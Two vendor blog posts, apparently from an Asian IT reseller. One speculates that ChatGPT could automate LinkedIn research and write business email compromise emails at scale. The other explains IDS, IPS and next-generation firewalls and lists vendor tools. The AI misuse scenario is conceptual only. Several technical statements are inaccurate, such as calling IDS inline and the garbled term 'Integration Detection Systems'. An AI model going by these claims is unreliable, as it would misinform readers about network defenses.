Almost the minute ChatGPT went live, the naysayers and doomsday prognosticators started to come out of the woodwork. Which is neither surprising nor troubling. ChatGPT is just the latest example of how artificial intelligence will transform the world in ways that we can’t predict, will struggle to control, and in some cases would never want.

Cybersecurity is a prime example. ChatGPT can generate passable (if not perfect) code just as it can prose. This could be a boon for developers of all kinds – including those that develop malware and other attacks. What’s to stop a hacker from using ChatGPT to expedite development and iterate endlessly, flooding the landscape with new threats? Similarly, why write your own phishing emails when ChatGPT, trained on countless past phishing emails, can generate thousands of them in seconds?

Automated writers lower the barrier to entering cybercrime while helping established criminals and gangs scale their efforts. More alarming, new technology always has unexpected, often unintended consequences, meaning that ChatGPT is sure to surprise us with how it gets weaponized, which is to say that the worst is yet to come.

The Ugly

To emphasize my previous point, let me outline a scenario I haven’t yet seen addressed in the ChatGPT conversation. Business email compromise (BEC) attacks are where hackers personalize phishing emails, texts, or other communications with personal information to make them seem like they are coming from the recipient’s boss, close colleague, or another trusted source. They also contain careful social engineering to inspire the recipient to act without considering risk or applying good judgment. They are basically phishing attacks carefully calibrated to succeed. Back in June, Wired wrote that they were “poised to eclipse ransomware” because they have proven so lucrative and also so resistant to security measures.

The saving grace was that BEC messages took time. Someone had to first do research on the targets and then turn that into fine-tuned copy. Therefore, they were hard to scale and difficult to get just right (many of these attacks still failed). There was a difficult if not definitive upper limit.

From my perspective, ChatGPT obliterates that obstacle. Imagine if an attacker trained automation to comb LinkedIn for data about people’s professional relationships, then fed that data into ChatGPT to create convincing BEC emails customized for hundreds or thousands of different recipients. If we can automate both the research and the writing parts, and do both on not just a massive scale but with uncanny precision, hackers can scale BEC campaigns to any size.

And then what? Will every email seem suspect? The cloud of doubt hanging over the authenticity of any piece of information or string of communication (did this come from someone real?) may prove as much or more disruptive than the attacks themselves. I’m just speculating. These doomsday scenarios, like so many others, may never materialize…Or BEC attacks could prove to be the least of our concerns.

That puts it on us – probably most people reading this site – to somehow ensure the good outweighs the rest.

 

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Why do you need both IDS and IPS, or maybe the NGFW too?

I would like to straighten the defense of the web application by talking about Intrusion Detection and Prevention Systems (IDS and IPS) as the third member of this security trio defense: WAF, RASP, and IDPS. In the previous articles, I talked about security defense technology Runtime Application Self-Protection (RASP) and Web Application Firewall (WAF).

What are IDS and IPS?

Intrusion Detection Systems and Intrusion Prevention Systems are used to detect intrusions and, if the intrusion is detected, to protect from it.

First, I will focus on explaining the differences between the WAF, RASP, and IDPS.

What is the difference between WAF, RASP, and IDPS?

I have already explained in previous articles the difference between WAF and RASP. Still, I will introduce IDPS and show you exactly why a combination of this trio is the best security choice.

Summary: IDPS is used to detect intrusions and protect from them. WAF will detect and block attacks based on rules, patterns, algorithms, etc. RASP detects the application runtime behavior using algorithms.

Why is it best to use both IDS and IPS?

To better understand why it is important to use both systems, we need to know what each of them does and doesn’t do and how combining them gives more effective protection. Each of those systems has its own types, which will be explained below.

Location and Range

These two types of security systems operate in different locations and have different ranges.

Facts:

·   IDS works across the enterprise network in real-time by monitoring and analyzing network traffic.

·   IPS works in the same network location as a firewall by intercepting network traffic.

·   IPS can use IDS to expand the range of monitoring.

By knowing this and using both IDPS, you can cover more range.

Host-based IDS and IPS

There are a few types of IDS and IPS. I will mention them so you can know which one targets what, but there is plenty of online documentation for more information.

Host-based IDS (HIDS) is used for protecting individual devices. It is deployed at the endpoint level. It checks network traffic in and out of a device, and it can examine logs and running processes. HIDS protects only the host machine. It does not scan complete network data. Similar to this type, IPS has its own Host-based IPS (HIPS). HIPS is deployed on clients/servers, and it monitors the device level as well.

Network-based IDS and IPS

Network-based IDS (NIDS) works on monitoring the entire network. It looks out at every network device and analyzes all the traffic to and from those devices. On the other side, IPS has its own type, called Network-based IPS (NIPS), deployed within the network infrastructure. It monitors the complete network and, if needed, tries to protect it.

**NIDS and NIPS are very important to network forensics and incident response because they compare incoming traffic to malicious signatures and differentiate good traffic from suspicious traffic.

Wireless IPS

IPS also has Wireless IPS (WIPS) type that monitors radio waves (wireless LAN) for unauthorized access points, which you can use to automate wireless network scanning. Techtarget site provided ways of using WIPS in enterprise in this article. Check it out!

Protocol-based intrusion detection systems (PIDS) and Application protocol-based intrusion detection systems (APIDS)

Both protocol-based systems are the type of IDS. They both monitor traffic to and from devices. The only difference is that PIDS monitors one server and APIDS group of servers.

Network behavioral analysis (NBA)

Network behavioral analysis (NBA) is the type of IPS that looks for unexpected behavior within patterns of a network itself.

IDS and IPS modes

IDS is generally set to work in inline mode. As for IPS, it is set to work in the network behind the firewall. It can operate in both modes: as an end host or in inline mode.

Most used IDS/IPS tools in 2022

According to softwaretestinghelp.com, the list of most used IDS tools is this:

·   SolarWinds Security Event Manager

·   Bro

·   OSSEC

·   Snort

·   Suricata

·   Security Onion

·   Open WIPS-NG

·   Sagan

·   McAfee Network Security Platform

·   Palo Alto Networks

For more info regarding pricing, pros, cons and features of these tools checkout the softwaretestinghelp site.

Also, spiceworks.com provided the list of the most used IDPS tools:

·   AirMagnet Enterprise

·   Amazon Web Services (AWS) GuardDuty

·   Azure Firewall Premium IDPS

·   Blumira

·   Cisco Secure IPS (NGIPS)

·   Darktrace Enterprise Immune System

·   IBM Intrusion Detection and Prevention System (IDPS) Management

·   Meraki MX Advanced Security Edition

·   NSFocus Next-Generation Intrusion Prevention System

·   Snort

For more info regarding pricing, pros, cons and features of these tools check out the spiceworks site. This research will also help you choose the right IDPS solution based on these tools’ features.

What is Next-Generation Firewall (NGFW) or Unified Threat Management (UTM)?

There is a modern type of technology that combines IDS and IPS with firewalls called Next-Generation Firewall (NGFW) or Unified Threat Management (UTM).

NGFW includes:

·   Standard firewall features (packet filtering, stateful inspection, and VPN awareness)

·   Integrated Intrusion Prevention (IPS)

·   Application awareness of threats

·   Detect and block risky apps

·   Threat intelligence

·   Upgrading security features (such as future information feeds)

·   New techniques that help to address new security threats

Researchers for nomios site have gathered information and made a list of the top 5 vendors for NGFW in 2022. Also, they gave suggestions on what you should look for when choosing the right NGFW tool. Check it out!

Conclusion

You should combine IDS and IPS because of three things: response, protection, and impact. If you decide to use IDS, the testing will stop at the detection phase but using IPS based on settings and policy testing will also include the prevention. Because IPS reacts immediately, it gives a certain layer of protection aside from detecting malicious activity. However, there are false positives possible using IPS that will end up shutting your network.

Organizations often set up Integration Detection Systems to handle the logs and notifications/alerts, routers, firewalls, and servers to fight threats.

A better solution would be using a combination of IDPS and setting it up when planning security. In the future, when the organization grows and needs better protection, it will be possible to use IDS/IPS solutions for additional networks, servers, or devices.

Also, depending on the organization’s security needs and cost restrictions, NGFW can be a good choice too!

Cover photo by krakenimages

#IPS #IDS #IDPS #NGFW

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.